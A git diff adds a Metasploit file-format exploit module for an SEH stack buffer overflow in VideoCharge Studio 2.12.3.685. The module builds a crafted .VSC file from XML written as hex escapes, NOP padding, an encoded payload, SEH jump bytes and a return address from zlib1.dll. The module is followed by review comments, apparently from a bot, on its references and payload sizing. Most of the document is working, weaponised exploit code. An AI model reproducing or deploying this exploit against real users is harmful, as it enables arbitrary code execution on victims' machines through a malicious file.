diff --git a/modules/exploits/windows/fileformat/videocharge_studio.rb b/modules/exploits/windows/fileformat/videocharge_studio.rb
new file mode 100644
index 0000000000..6204fa1843
--- /dev/null
+++ b/modules/exploits/windows/fileformat/videocharge_studio.rb
@@ -0,0 +1,92 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Msf::Exploit::FILEFORMAT
+ include Msf::Exploit::Seh
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'VideoCharge Studio 2.12.3.685 Buffer Overflow (SEH)',
+ 'Description' => %q{
+ This module exploits a stack based buffer overflow in VideoCharge Studio 2.12.3.685 when
+ processing a specially crafted .VSC file. This vulnerability could be
+ exploited by a remote attacker to execute arbitrary code on the target
+ machine by enticing a user of VideoCharge Studio to open a malicious .VSC file.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'metacom', # Original discovery
+ 'Andrew Smith', # MSF Module
+ ],
+ 'References' =>
+ [
+ [ 'OSVDB', '69616' ],
+ [ 'CVE', '' ],
+ [ 'EBD', '29234' ]
+ ],
+ 'DefaultOptions' =>
+ {
+ 'ExitFunction' => 'process',
+ },
+ 'Platform' => 'win',
+ 'Payload' =>
+ {
+ 'BadChars' => "\x00\x0a\x0d\x3c\x22\x26",
+ 'DisableNops' => true,
+ },
+
+ 'Targets' =>
+ [
+ [ 'VideoCharge Studio 2.12.3.685',
+ {
+ 'Ret' => 0x61B811F1, #p/p/r | zlib1.dll
+ 'Offset' => 824
+ }
+ ],
+ ],
+ 'Privileged' => false,
+ 'DisclosureDate' => 'Oct 27 2013',
+ 'DefaultTarget' => 0))
+
+ register_options([OptString.new('FILENAME', [ false, 'The file name.', 'msf.vsc']),], self.class)
+
+ end
+
+ def exploit
+
+ buffer = "\x3C\x3F\x78\x6D\x6C\x20\x76\x65\x72\x73\x69\x6F\x6E\x3D\x22\x31\x2E\x30\x22"
+ buffer << "\x20\x65\x6E\x63\x6F\x64\x69\x6E\x67\x3D\x22\x57\x69\x6E\x64\x6F\x77\x73\x2D\x31\x32"
+ buffer << "\x35\x32\x22\x20\x3F\x3E\x3C\x63\x6F\x6E\x66\x69\x67\x20\x76\x65\x72\x3D\x22\x32\x2E"
+ buffer << "\x31\x32\x2E\x33\x2E\x36\x38\x35\x22\x3E\x0A\x0A\x3C\x63\x6F\x6C\x73\x20\x6E\x61\x6D"
+ buffer << "\x65\x3D\x22\x46\x69\x6C\x65\x73\x22\x2F\x3E\x0A\x0A\x3C\x63\x6F\x6C\x73\x20\x6E\x61"
+ buffer << "\x6D\x65\x3D\x22\x50\x72\x6F\x66\x69\x6C\x65\x73\x22\x3E\x0A\x0A\x3C\x50\x72\x6F\x70"
+ buffer << "\x65\x72\x74\x79\x20\x6E\x61\x6D\x65\x3D\x22\x50\x72\x6F\x66\x69\x6C\x65\x22\x3E\x0A"
+ buffer << "\x0A\x3C\x63\x6F\x6C\x73\x20\x6E\x61\x6D\x65\x3D\x22\x46\x6F\x72\x6D\x61\x74\x73\x22"
+ buffer << "\x3E\x0A\x0A\x3C\x50\x72\x6F\x70\x65\x72\x74\x79\x20\x6E\x61\x6D\x65\x3D\x22\x53\x74"
+ buffer << "\x72\x65\x61\x6D\x22\x3E\x0A\x0A\x3C\x56\x61\x6C\x75\x65\x20\x6E\x61\x6D\x65\x3D\x22"
+ buffer << "\x4E\x61\x6D\x65\x22\x20\x74\x79\x70\x65\x3D\x22\x38\x22\x20\x76\x61\x6C\x75\x65\x3D\x22"
+ buffer << make_nops(target['Offset']-payload.encoded.length)
+ buffer << payload.encoded
+ buffer << "\xeb\x06\x90\x90" #nseh negative jump
+ buffer << [target.ret].pack("V")
+ buffer << "\xe9\x3f\xfd\xff\xff" #long jump
+ buffer << "\x22\x2F\x3E\x0A\x0A\x3C\x2F\x50\x72\x6F\x70\x65\x72\x74\x79\x3E\x0A\x0A\x3C\x2F"
+ buffer << "\x63\x6F\x6C\x73\x3E\x0A\x0A\x3C\x63\x6F\x6C\x73\x20\x6E\x61\x6D\x65\x3D\x22\x52\x6F"
+ buffer << "\x6D\x61\x6E\x69\x61\x20\x53\x65\x63\x75\x72\x69\x74\x79\x20\x54\x65\x61\x6D\x22\x2F"
+ buffer << "\x3E\x0A\x0A\x3C\x2F\x50\x72\x6F\x70\x65\x72\x74\x79\x3E\x0A\x0A\x3C\x2F\x63\x6F\x6C"
+ buffer << "\x73\x3E\x0A\x0A\x3C\x2F\x63\x6F\x6E\x66\x69\x67\x3E"
+
+ print_status("Creating '#{datastore['FILENAME']}' file ...")
+ file_create(buffer)
+
+ end
+end
+
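Review bot: The reference list in `initialize` carries an empty CVE entry (`[ 'CVE', '' ]`) and a misspelled reference key `'EBD'`; the framework's Exploit-DB reference type is `EDB`, so the link will not resolve, and the blank CVE should be dropped rather than left as an empty string — `[ 'EDB', '29234' ]` with the CVE line removed. The fixed prefix and suffix of the generated file in `exploit` are plain ASCII XML spelled out as `\xNN` escapes, which hides the document structure from review; writing those parts as ordinary string literals or a heredoc and keeping only the `make_nops`, `payload.encoded` and `target.ret` pieces as binary data would make the file layout auditable at a glance. The `Payload` hash declares no `'Space'`, so nothing bounds `payload.encoded.length` against `target['Offset']` before `make_nops(target['Offset']-payload.encoded.length)` and a negative count can reach `make_nops`; stating the available size there is the usual way to let the framework reject oversized payloads up front.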